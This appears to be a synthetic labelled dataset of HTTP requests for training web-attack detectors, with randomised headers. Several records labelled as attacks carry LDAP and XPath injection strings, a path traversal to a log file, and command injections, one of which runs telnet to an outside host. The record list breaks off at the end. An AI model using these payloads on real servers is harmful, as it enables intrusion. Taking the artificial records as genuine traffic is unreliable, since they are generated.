User-Agent: Mozilla/8.4 (Windows; U; Win 9x 1.7; Fo-p3; rv:6.5.5) Gecko/16774376
UA-CPU: Sparc
UA-Disp: 7402,9004,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4728x9077
Via: 9.6 www.zn9s.gif:7362
Transfer-Encoding: compress
Upgrade: axh/8.9, sit/8.6, rcc/1.0, ite/1.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42097
Start - Id: 5939
class: Valid
POST /dsolpnnaTtgkttotor2/wget8sU0lib/ydjIienhweaCtILsaoob/3hrHrAT868/tvXa/emijnjteowania/ejIYI9MWE/oC1aX6HchWiYrAruQT.htm? HTTP/1.1
Content-Length: 59
Content-Language: v,viw0
Content-Encoding: identity
Content-Location: /exaOh/lkag/ohoo6oz/qtnt38rs/eheoop.avi
Content-MD5: b2JybnRldG5kcmZuaFN0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 Nov 07 14:06:48 GMT
Last-Modified: Thu, 05 Feb 04 08:18:19 CET
Host: www.oret.it:474
Connection: close
Accept: image/gif;q=0.5, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: 7lv9-lr6nnji;q=0.5, i-tzmoi, jsvj-5e871n9;q=0.7
Cache-Control: s=eos
Client-ip: 182.209.58.87
Cookie: nph-styleXu0paccepty=sock_streamo5Hidsia;b9EoearrdiooaCc=MMri66ie6mmoaiMiry;JT7r=to?la;iZbhoRnetscqera=888;aol9iqB=5032
Cookie2: $Version="421"
Date: Tue, 13 Oct 09 03:15:49 GMT
ETag: W/"ZofDx5HpO_bdoX7MkU"
Expect: 100-continue
From: radpook@j7onIyia.org
If-Modified-Since: Thu, 13 Aug 09 07:28:41 CET
If-Unmodified-Since: Fri, 30 Jan 04 11:39:34 UTC
If-Match: "GpCxzgRih2Y_IQxZ"
If-None-Match: "6kq21K1wi_c2pklpwy"
If-Range: *
Max-Forwards: 2648
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: hEit lMChdia=aSawel
Authorization: NTLM c2FUWm9rZXd1aG4wZnFhaWVpaGxjNnRlc1Jzc2VUbTZldnR6
Range: 50069-26553
Referer: http://www.hIditahe.uk/eu0Ogio.pdf
TE: trailers,gzip;q=0.0,trailers
Trailer: Range
User-Agent: nnisN (iC2Sqk3-xS)
UA-CPU: x86
UA-Disp: 731,381,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3436x257
Via: 9.1 55.12.207.27, zal/0.4 www.eec3oas.gif, 4.4 244.0.13.213:819
Transfer-Encoding: deflate
Upgrade: us1T4/6.4
Warning: 725 www.sdsWm.shtml "dsLrjmutignetroi5n" "Wed, 04 Jun 08 20:36:56 UTC"
X-Forwarded-For: 81.125.98.15
X-Serial-Number: 235537183752
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3ttrnoyrejhc=823&Csyiphaorteti=n&t+c2eTv=mw&sg=891906

End - Id: 5939
Start - Id: 25315
class: Valid
GET /dQi3xNoWuD.M05p67U/VV/fhdha/eHLlKX/anbd6R9hr_o4SuKbFimM/usaGABoama9ec/it9sirNtauNEi/oyw0NUy/ChttpeFzKUvXH8BD/wskV10RK1ZFL_d4/XXm7dCLielog-KW/tnmre7ec1.jpg?r9liatnao=bxhU0NVErE_n&fq=+%3C&5odcr=ji%40eromhwstj+s3forml4It&Iiu=uti HTTP/1.0
Host: www.2b0oah.cz
Connection: keep-alive
Accept: video/*;q=0.6
Accept-Charset: big5, iso-8859-8-i;q=0.2, iso-8859-8-i;q=0.4, x-mac-arabic, shift_jis
Accept-Encoding: gzip
Accept-Language: leut-l5eglr;q=0.8, nlO-ne5omco;q=0.8, aaepniq-iblshn;q=0.8, 6vtp-nnh9nqid;q=0.9
Cache-Control: no-transform
Client-ip: 247.134.238.48
Cookie: neuth=twart;ZCieyiyq7_.=06348;ufTbo=tRLtWjdsNvYE;nNat5ieme=837
Cookie2: $Version="647"
Date: Sun, 22 Mar 09 07:12:57 UTC
ETag: "3Ax5VcM89xogUtWtM"
Expect: 100-continue
From: xion@agin3dxsi.be
If-Modified-Since: Sun, 19 Jun 05 14:52:16 GMT
If-Unmodified-Since: Mon, 03 Nov 08 12:43:17 CET
If-Match: "2_TuIps3qT7h9im4"
If-None-Match: "NHU.LFBqT6jgwBUG@DO"
If-Range: Wed, 23 Apr 08 22:37:56 UTC
Max-Forwards: 54
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic aUtpOG86b2Rybw==
Authorization: Digest username="ios7"
Range: -3,19-,-049
Referer: http://www.xesueb.cz/rTEaaaet/iyrBsDu/iauz.sh
TE: gzip,trailers,chunked;q=0.8
Trailer: Accept-Language
User-Agent: wrnhh4eohtgzwvoa
UA-CPU: 68000
UA-Disp: 843,519,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1204x4016
Via: 3.2 www.ctfrj8yo.css, 0.2 236.47.81.129, 5.7 www.teidooon.jpeg
Transfer-Encoding: deflate
Upgrade: le5a/5.6, eso/6.1
Warning: 791 www.syt5.png "llEhywSTamsu" 
X-Forwarded-For: 80.80.131.136
X-Serial-Number: 8816799140525105840
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25315
Start - Id: 13511
class: Valid
GET /WEs3eg0EheuiRhm/rszJFPJ1childkRsF/oY5M23v@-ry/v-/eoFxF/NyPVPSSHjbr/yHOn4ZJTM.Rex537/rxoOCVDN2CTMMVJ6z/md/zEnA@KFFs8gML2DJI/ynLeO/tdf5CaaVROR7sJGNbt.tiff?fnqar56AtqtTta=av%29E&gra9o=sNRG-%40_oyJsl&rorscohiwiwtb=0&engsmerts6uE56r=ssu%3Aiifiu-h&e8=nwiu7 HTTP/1.0
Host: 99.20.197.153
Connection: olsohdd
Accept: application/*, video/quicktime, text/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: io-rariekhX
Cache-Control: only-if-cached
Client-ip: 22.56.246.14
Cookie: eidOwxt1E7oyegi=pjdzh;se6tN=amr Iee(~5=hr;\;RO=rls$
Cookie2: $Version="839"
Date: Tue, 23 Oct 07 05:43:48 UTC
ETag: "8gV8sWEuE.WleVASL2z"
Expect: 100-continue
From: reyhi@itnouasdie.ch
If-Modified-Since: Sat, 21 Jan 06 03:00:41 CET
If-Unmodified-Since: Wed, 05 Oct 05 24:02:10 GMT
If-Match: *
If-None-Match: "X3eO8Ek.gFTBsk_"
If-Range: "bBJdLEzjjp12Q@b"
Max-Forwards: 63
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest uri=/uult/hNAEdi/arteht.tiff
Authorization: Basic dEVyUjU6cmRkWXY3
Range: 99683-
Referer: /etclmtut/1tge/fLu4/7ag2pEF/thwoMo.swf
TE: gzip;q=0.5,deflate;q=0.7
Trailer: Via
User-Agent: rHecGndZ http://www.hiemlile.st
UA-CPU: x86
UA-Disp: 1040,6000,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 912x6854
Via: FTP/8.0 www.osop.tiff, s7hf/4.1 www.whlG.gif
Transfer-Encoding: identity
Upgrade: anTia/3.2, i8A/9.8
Warning: 707 86.35.37.2 "9TdUnnt" "Mon, 08 Jan 07 05:09:18 UTC"
X-Forwarded-For: 43.46.247.235
X-Serial-Number: 43048175021
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 13511
Start - Id: 38904
class: LdapInjection
GET /eLBVMEsDS6p9l/obheeNtpecbesese/0z@AL2XAo.pl?asen=%29++%28+%7C++%28displayName%3Dhad*%29++%28name+%3D+had*+++%29%28++mail%3Dhad*++++%29&t5ee6=ss&eArrnzneakdemo=380423&anrytxDtwets=hbl6hCYNP&tfeauasit=eoit HTTP/1.0
Host: 214.32.167.145
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.7, deflate, gzip;q=0.4
Accept-Language: *
Cache-Control: max-stale
Cookie: mieesoscr=9;atst2ser3=029923596
Date: Mon, 28 Aug 06 13:03:15 GMT
ETag: W/"2GEamMx-ggUI9_T@t"
Expect: 100-continue
If-Modified-Since: Mon, 27 Feb 06 11:19:12 CET
If-Unmodified-Since: Wed, 03 Mar 04 18:11:01 GMT
If-Match: "aAl5EME3QyB0rxU@Vku6"
If-None-Match: "PCN9XZaXnlemKo0wq"
If-Range: Fri, 17 Nov 06 15:17:21 UTC
Max-Forwards: 9407
Pragma: no-cache
Proxy-Authorization: 3h2se aosE=ainerp3e
Authorization: 77rz aCeoso2=eaoz
Range: 82450-0782,-876
Referer: http://www.eetto.net/tirihthm/Jiaa2dI4/eantE.txt
TE: trailers,gzip;q=0.2,trailers
Trailer: If-Modified-Since
User-Agent: ne9NmT2ehpEyae
UA-OS: Win95
Via: 4.6 www.0ddt.htm
Transfer-Encoding: gzip
X-Forwarded-For: 62.216.65.91
X-Serial-Number: 99898684535119255
----: -------------------

null

End - Id: 38904
Start - Id: 36565
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.0
Host: 47.248.231.63:80
Connection: close
Accept: image/png, video/*;q=0.3, audio/basic
Accept-Charset: windows-1257
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: tvvewn='3exEttok'
Client-ip: 117.70.6.179
Cookie: j6WQKtdR=d_B7U;madsn=lrRnszyaaS9'i;fnwt0=53888
Cookie2: $Version="655"
Date: Sat, 17 May 08 07:07:19 GMT
ETag: "._sHr99T4AKY.QbUteoU"
Expect: e2h0
From: osNAoh@aHn2nry.de
If-Modified-Since: Mon, 17 Sep 07 02:32:52 GMT
If-Unmodified-Since: Fri, 17 Oct 08 02:22:47 CET
If-Match: "p1IY0hBynYBC.mNb"
If-None-Match: *
If-Range: Wed, 06 Apr 05 08:40:52 GMT
Max-Forwards: 1570
MIME-Version: 4.8
Pragma: uyT8t9do=eyre6
Proxy-Authorization: 4eitC tieta=unrJ6ewe
Authorization: NTLM bmdpdWx0bGdlZ3R3bzlzc0Vsb2Vhd3E0dXNvZ3dpdWhvZ2F1b3hlYnBTdmk0aTU=
Range: -961935,910376-
Referer: http://www.gd3ff.st/hhof3d/oefttken.dll
TE: chunked;q=0.4
Trailer: If-Match
User-Agent: iuc7/7.9.7.5.3
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 547x5195
Via: HTTP/2.9 186.100.131.110
Transfer-Encoding: deflate
Upgrade: iOe8/3.1
Warning: 144 52.115.217.55:7498 "trdsyhirr51fyxZdk" 
X-Forwarded-For: 232.88.214.55
X-Serial-Number: 33496662681000
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36565
Start - Id: 893
class: Valid
GET /nmG1Q1.shtml? HTTP/1.1
Host: 60.217.122.0
Connection: aile
Accept: text/*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 249.188.212.83
Cookie: iIey2iracaey6G=66236256;nEio=ed;aeiloi=oBzebti
Cookie2: $Version="968"
Date: Wed, 10 Feb 10 12:39:32 UTC
ETag: "33HcNbBNC1HdtlHTdYe"
Expect: dleotob
From: Ou2tor@taoe.fr
If-Modified-Since: Thu, 11 Jun 09 14:16:10 UTC
If-Unmodified-Since: Wed, 28 Jan 04 17:50:34 GMT
If-Match: "vbUp.BGZGYWv6gJAF"
If-None-Match: *
If-Range: Thu, 03 Jan 08 14:22:07 GMT
Max-Forwards: 93
MIME-Version: 0.0
Pragma: t=7vmh9
Proxy-Authorization: Basic ZW5lRGVhOmthbnRuUjJz
Authorization: Basic ckFtY0E2bmk6bmF6clRm
Range: 24-
Referer: /tjGl/r9ot3eeq/tA1lu/aAwatu.ace
TE: deflate,deflate;q=0.1
Trailer: Accept-Encoding
User-Agent: Mozilla/5.5 (Machintosh; U; Mac OS X 3.0; Hk-yh; rv:7.1.2) Gecko/43195036
UA-CPU: 68000
UA-Disp: 1675,0086,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 848x029
Via: p5t/3.5 241.156.213.245, 1s7nhl/4.8 45.240.173.12
Transfer-Encoding: gzip
Upgrade: qos/8.5, uhncee/1.8, heeaj/4.9, Eng9hD/1.7, teo/3.0
Warning: 467 www.00teeo.htm "rapsHi" 
X-Forwarded-For: 168.48.15.93
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 893
Start - Id: 28910
class: Valid
GET /msY-0dHwzlgAY@t2/eno/jqwgetuX2Nnodeye9s.gz/ioeIt43tnehs/pibed9davi/9J4NPPSg5lJvkm2/teLrsk/oovwoG@w7@1sxOCfe/q1tdwiac3Ad6.nsf? HTTP/1.1
Host: www.bpletBaFom.fr
Connection: close
Accept: image/*;q=0.8, audio/basic, application/*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: gs0-9eerm3, Eddpeiu6-n3habwap;q=0.1, ic4dE-0hwWn
Cache-Control: min-fresh=1
Client-ip: 189.113.60.102
Cookie: wq2L2F=7;9dnl@K-3=he7rdrIswefhtairTt;mDSuchoo=aytesies;IuWK_=odshhtl4niI2ahhe1e;a0ined=n@uaiex
Cookie2: $Version="054"
Date: Sat, 14 Jul 07 09:35:26 UTC
ETag: "9Q0MBIzn_p4B.dvZn1l"
Expect: 100-continue
From: em2nped@eail.de
If-Modified-Since: Mon, 16 Feb 09 11:48:59 GMT
If-Unmodified-Since: Mon, 28 Feb 05 04:47:46 CET
If-Match: "MYz9cdagIEaJTRT7_YTu"
If-None-Match: "sVlfOlPp6h@loBIV"
If-Range: Sat, 27 Sep 08 05:40:16 GMT
Max-Forwards: 29
MIME-Version: 9.1
Pragma: scOf='tC'
Proxy-Authorization: Digest uri=/qjEaKd.asp
Authorization: Basic dG9jNWU4cG06YWVuNm8=
Range: 492-,-067,215329-8229
Referer: /tpVcm/iuwuln/iaa2aOhb/iAbhtf5.conf
TE: gzip;q=0.0
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.2 (compatible; o9mi; Open BSD i586; ccefBoi9; p9cE; ihnleur)
UA-CPU: StrongARM
UA-Disp: 586,8416,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4214x6958
Via: 1.7 177.140.59.206
Transfer-Encoding: Thrv; ozosyag=ws1wtett
Upgrade: gtFdng/9.2, tlogad/2.0, 0nanTR/9.4, nu1d/8.3
Warning: 209 www.lust7.js:12042 "fiu51is" 
X-Forwarded-For: 160.62.173.241
X-Serial-Number: 2568531119908025423
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28910
Start - Id: 36799
class: OsCommanding
GET /gxLsMHscript@07Qm/objectshV9znetcatQ_yfSdrop5/xoklhomp1y/3aocvd/reu4nba/odc/RpR/acceptzE17IqUFkabetweenV1.dll?dm5teY=924308196&erbokS8hehN=kh5ce&smgheral=oa&ddhic=%5C%22+%5C%3B+%5C%2Fusr%5C%2Fbin%5C%2Ftelnet++www.iclimaelllor.com+976%3B HTTP/1.1
Host: www.hweixnr7aa.ch:80
Connection: glil7
Accept: text/html;q=0.4, image/*;q=0.1
Accept-Charset: iso-2022-jp, euc-kr;q=0.6, x-mac-turkish, iso-2022-jp
Accept-Encoding: 
Accept-Language: u-n0lto
Cache-Control: no-store
Client-ip: 215.243.66.219
Cookie: sD7cnl=k;ArclzwcDaLalox=06207701;ip4=7sa;wM0i=tlnu8u;AJHG=08vrex;ncCunrlawaDy2ir=nn6
Cookie2: $Version="08"
Date: Tue, 21 Mar 06 24:44:08 UTC
ETag: W/"8334JjPUOIE_-tVFu"
Expect: sid9n=eluiuds;m3ishri=rjmr
From: wsCala@r0ragpmo.de
If-Modified-Since: Tue, 02 Sep 08 21:53:29 GMT
If-Unmodified-Since: Mon, 19 Apr 10 16:03:18 GMT
If-Match: "CVP4F9VGe_r1pmKKfDX"
If-None-Match: "Aif7YJnnT6Pe-lSeVYHD"
If-Range: Sun, 28 Sep 08 14:04:53 CET
Max-Forwards: 36
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: ul8wy wpHmreh=nsssH2
Authorization: 2tiuo7 mksbe=Ue6Fot
Range: -696,54746-
Referer: http://a4dmoxt.cz/mothimzr.msf
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u 4.3; T8-e4; rv:1.3.5) Gecko/27076185
UA-CPU: PowerPC
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: 3.2 www.eitw.htm, ess/9.1 www.syhgu.jpg, HTTP/0.1 www.emmjrti.css
Transfer-Encoding: compress
Upgrade: taos/1.4
Warning: 870 www.spydgb.jpg "hrhsaomoChmoogw" 
X-Forwarded-For: 37.3.209.174
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36799
Start - Id: 46108
class: PathTransversal
PUT /wAOeR/g48AOntd9HsbaR4aMmPG.asmx? HTTP/1.1
Content-Length: 241
Content-Language: piRe,e,dDsn3iv
Content-Encoding: compress
Content-Location: http://tCtkMi.biz/ha5ag/eAf4Ua/sivxak/hglle/yeae.png
Content-MD5: bmRvZXI3b2VkcWFlZVRldA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 06 May 06 09:26:31 UTC
Last-Modified: Tue, 06 May 08 15:40:14 UTC
Host: www.Qrmdko.st
Connection: 7rtfeeop
Accept: */*;q=0.4
Accept-Charset: x-mac-greek, x-mac-ce;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 78.173.68.149
Cookie: teefSzzicHdhg=rByipAvyBS_J
Cookie2: $Version="6"
Date: Wed, 20 Feb 08 21:03:28 UTC
ETag: W/"tezP7LWPcMvfNfn.@"
Expect: rXsedfef
From: sneTb@ntoa.org
If-Modified-Since: Sat, 13 Dec 08 17:53:18 GMT
If-Unmodified-Since: Sun, 04 Jan 09 18:18:42 CET
If-Match: "7daUXr4sMREv4k@w11R"
If-None-Match: "eaDJv2vn9mMXRHLOE"
If-Range: Fri, 12 Aug 05 10:34:02 GMT
Max-Forwards: 428
MIME-Version: 0.9
Pragma: w='S'
Proxy-Authorization: NTLM N3lkaXZoNXRmcmFuaG9sYWRuYWlkbm90YW9lZHBqZUlob0F5ZU5h
Authorization: iQna es5o=peY19
Range: -03018,-4474
Referer: /heHIb/g1aLs.rar
TE: chunked;q=0.0,chunked,trailers
Trailer: If-Match
User-Agent: Mozilla/2.2 (compatible; w1iaiOdb; WinNT; ou8fnl)
UA-CPU: StrongARM
UA-Disp: 013,8329,8
UA-Color: color16
UA-Pixels: 1090x096
Via: FTP/7.7 www.ezo6eiCe.css, 5.4 www.eeotiee0.jpg, FTP/3.3 87.79.168.17:4
Transfer-Encoding: gzip
Upgrade: cRpj/3.7
Warning: 825 www.rthoh4.html:3 "sTlt2eutin4eMhjcw" "Sun, 01 Feb 04 07:08:46 UTC"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

HetnasspaeS=../../../../var/log/access_log%00.html&nr=epjmn&adMou6linkytelnet=42&ngrs=0ov &eu=ugjaaeeRdiwe]&jomemiosdtn=0a&ad5Hto=805595854&yah7ofic=sYAvu9zj&v7P0tP__LaG=amhm244&xe=le&DK5-K=e&sce8tln=tl&uU.I=dnanpstfma>tnip

End - Id: 46108
Start - Id: 22580
class: Valid
GET /sNlaY3IQGFaTraxc/cosrRtr.shtml?oelnnNyoilsp=8453915435&ltngcL=169&spocettbhddze=322930 HTTP/1.0
Host: www.iyA9o5rlte.fr
Connection: keep-alive
Accept: audio/x-wav, audio/x-wav, image/gif;q=0.3
Accept-Charset: iso-8859-5;q=0.7, windows-1257;q=0.3, x-mac-japanese
Accept-Encoding: identity, identity
Accept-Language: ibe-e;q=0.2, mm5-5n, ae-iytn3;q=0.2, lbeh0dhl-jgoeeo
Cache-Control: no-store
Client-ip: 14.142.132.191
Cookie: Ec=78;WaxJDivw=tte6cn8tsmhns;74rs59plr9h1=57805;49sChct=0emlh:n) at>tps3https;1riwe=nnftio7lamkNultc
Cookie2: $Version="72"
Date: Mon, 17 Jul 06 07:40:58 UTC
ETag: "K1Fub7klIvNIjnohILe"
Expect: dsem
From: ttgier@4iiZc.be
If-Modified-Since: Thu, 15 Jun 06 15:22:37 GMT
If-Unmodified-Since: Thu, 02 Dec 04 14:57:14 GMT
If-Match: *
If-None-Match: *
If-Range: "4DVA_SmCX1Mw24pcp@"
Max-Forwards: 3
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM dGhkZkJhc241Z2RlRXF6YWl4bGFobGFzOGhhcnJPYXR4dG90aGllbmhzcGdz
Authorization: NTLM RDdEaXRtcndXakZtZWlhZDN0ZUlpcHJwZWVjbGFzYXBlbmV0aWVkbzBnb2xkbGxj
Range: 4696-5,-34840
Referer: /oteyARFe/fearnnm/tr4p4/nbrThae.pdf
TE: trailers,trailers,deflate
Trailer: Accept-Charset
User-Agent: daekOic/9.3
UA-CPU: Sparc
UA-Disp: 5896,055,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 012x8198
Via: HTTP/0.2 www.eCcT.jpg
Transfer-Encoding: identity
Upgrade: mhcsbe/5.4, rea/6.1, rvnsK6/9.4, i1O/4.3, dsl/5.2
Warning: 649 www.3snl9.jpg:7772 "cetphelatiyt" 
X-Forwarded-For: 227.174.126.186
X-Serial-Number: 8769415
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22580
Start - Id: 33029
class: Valid
POST /hbetweenzECcmdwinntAexec/Hcipee9tgfm1d8caet/7n3thaQ0l7panhPfcafn/ip3af@QBOUTGN/g_NSKekz.appA/h-quQkLJperlS/sJcX6gJ9_VGv7p7_39r/h8B3z/s0Wll/daN8cx26nlaS/teevE.css? HTTP/1.1
Content-Length: 195
Content-Language: a4m5Oog
Content-Encoding: compress
Content-Location: http://j4Xttoa.biz/isdarr/rhaNtqt/ejrnra.jsp
Content-MD5: anNURFd1bXRxVkJ2YXNlbw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Mar 05 09:27:14 CET
Last-Modified: Fri, 10 Jun 05 07:09:50 CET
Host: www.nnwmkraiA8.net
Connection: keep-alive
Accept: image/*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.8
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 75.232.39.149
Cookie: mtllgejro=0663;en8dubxsn=ala(c;th=OVn5i2emtsnN3srt;2oedrdhw4e=06;3jcmdXQwSFJP=nda|aettmpmocha@tcmd5ton
Cookie2: $Version="76"
Date: Wed, 16 Apr 08 14:11:37 GMT
ETag: "b4swYzGtubOumiB6"
Expect: aldrq7oa=byxdna;n6w6=iisr
From: ihYUAw@ivSmbM.it
If-Modified-Since: Thu, 15 Feb 07 15:06:33 GMT
If-Unmodified-Since: Wed, 30 Mar 05 11:44:12 CET
If-Match: *
If-None-Match: *
If-Range: "JgEfX7pCK3UeZLQQd"
Max-Forwards: 168
MIME-Version: 0.6
Pragma: lejaS='leitoCd1'
Proxy-Authorization: NTLM RWI0cGxlbW5taGV0NnNhdXZleG5vM3dhaGlzdG1yc2lu
Authorization: scnio l9sL=1eDaIgrr
Range: -653509,070-
Referer: /mrWngme.dll
TE: deflate;q=0.7,deflate;q=0.2
Trailer: User-Agent
User-Agent: raLeNonthriei
UA-CPU: 68000
UA-Disp: 8116,2322,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 699x4175
Via: 7.3 97.71.100.64
Transfer-Encoding: aNnst; 0nreT=co8ax
Upgrade: ceysO/0.3, sherw/9.0, 9Ojtfs/4.0, eslfme/3.1
Warning: 720 www.bomrenrn.tiff "ffytyrieot" "Sat, 25 Jun 05 21:01:28 CET"
X-Forwarded-For: 101.97.72.137
X-Serial-Number: 01279486631284
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sc=le0s&5ihhmueeNasN60r=vyu&nn78tniyeVb9=vexec-&9saaA4ulftiri=43483&dc=3957&edtnn= bin&5hmEho3hstalyt=fSSeynitN&kepca6en=NT&oifieaorDotr4tb=807&uettd4l7eaaoo=armotywindow.openbiitoxml&diwsLuk=tJ-

End - Id: 33029
Start - Id: 49418
class: XPathInjection
GET /ko7aiUdheo0fstrspn7h/o60T0jM0r/npM_/sK.eJM0b9L3Z-Yg@bDr/eD7XtUQgI/et4oeE/aOyg4j8cY8wXMqzBypwY.swf?y2eid8nyEtz=24801390&elmdctemvts=Tl8&nec=afwjMJ&nwqmy2lc=424+++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+94276%3D&aepeiloieeOc=ahttpefrom%3F7jh&gTpM=nodeq%5C%22aoseuaola%22r&e21dt77itimeeOd=921620551&nutSmal=qdooc+tt7lbh&ENxS3=420&tjadepdgdwi5eG=tsre+%264openlon%3Dto HTTP/1.0
Host: www.twJhm.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: igaqes='r'
Client-ip: 93.18.190.156
Cookie: in692knqgY-S=nAt4jh3l;7elr4Afyjedabt=\h:Hnna|)56@stits]iu;tceao=$ewoeeehe whereEcmaildC;tqoh4srbl=am
Cookie2: $Version="37"
Date: Wed, 16 Feb 05 08:51:05 UTC
ETag: W/"IXBYtGPigF@4TsSjY2SL"
Expect: denean=anNwroTo
From: 2etopwi@exrhsnpxt.org
If-Modified-Since: Sat, 25 Jul 09 09:05:12 UTC
If-Unmodified-Since: Wed, 30 Apr 08 11:41:36 GMT
If-Match: "_9QTrUaBVPXaYoFY1"
If-None-Match: "DH14wSY@1m_Vmjij6"
If-Range: Sun, 11 Feb 07 15:57:34 CET
Max-Forwards: 172
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic cHRoeWc1OnJnaGEyZHR0
Authorization: Digest nc=A74a4Ae1
Range: 77585-376599
Referer: /cts1gnfa/sodrEi/srfo9nl/kbyvd.tar.gz
TE: gzip,trailers
Trailer: Cache-Control
User-Agent: fOfckzmPSr http://www.oniore7.it
UA-CPU: StrongARM
UA-Disp: 422,204,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 8.4 191.223.218.165:1907, FTP/3.1 www.tHc9Nw.js
Transfer-Encoding: gzip
Upgrade: nostnl/9.9, gueoi/6.9, Nceiet/2.3, aiOs/0.5, fiuA/5.5
Warning: 168 www.mBsttTo.jpg "zsvb" "Fri, 02 Nov 07 10:06:41 UTC"
X-Forwarded-For: 222.117.148.160
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49418
Start - Id: 38060
class: LdapInjection
GET /nD/fcdIzTMKd4A1O-cdTFW/atKIpM-AUVWBMcwtZ1lD/.DsN336d9/iU/iAmcafRroe/YFe-2@DU/wgcineEIhynoh/c5F6eeonie3Tru/Stlreeieewgl.js?apntdy=osia%29%28%26%28objectClass%3D++wid*%29 HTTP/1.0
Host: 114.163.198.145
Connection: close
Accept: image/gif, application/*;q=0.0, text/*
Accept-Charset: *
Accept-Encoding: identity;q=0.8, identity;q=0.2, deflate, gzip, compress
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 26.50.164.170
Cookie: oiqrozW=jzqlwocei;agogpdtraaiu=56;thobslqe=t5a;xRgG5Dyselect=5482;soRmLnOmqatqdah=06595650;7aqeuuoowrv=4302081613
Cookie2: $Version="7"
Date: Mon, 26 Oct 09 15:51:11 GMT
ETag: "WyvG8K_AwpOUvCzMKd"
Expect: 100-continue
From: eoMt7@ridEmrif0e.it
If-Modified-Since: Sat, 01 Mar 08 08:22:30 CET
If-Unmodified-Since: Wed, 11 May 05 12:18:55 CET
If-Match: *
If-None-Match: "VR@WTL62r_u.Or7"
If-Range: Tue, 13 Sep 05 12:59:27 UTC
Max-Forwards: 89
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest realm
Range: 129372-,-059,12157-
Referer: /imzttn/svosiir/tz0fN/ioeru.php
TE: gzip;q=0.2
Trailer: Authorization
User-Agent: i2nelryset34
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 427x816
Via: tWq/1.4 174.205.206.12
Transfer-Encoding: compress
Upgrade: uw5/3.9, vdsth/9.5, so4/9.1
Warning: 825 116.151.251.79:4332 "d7aga7herbaA" 
X-Forwarded-For: 84.58.38.49
X-Serial-Number: 94095568311644
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38060
Start - Id: 10030
class: Valid
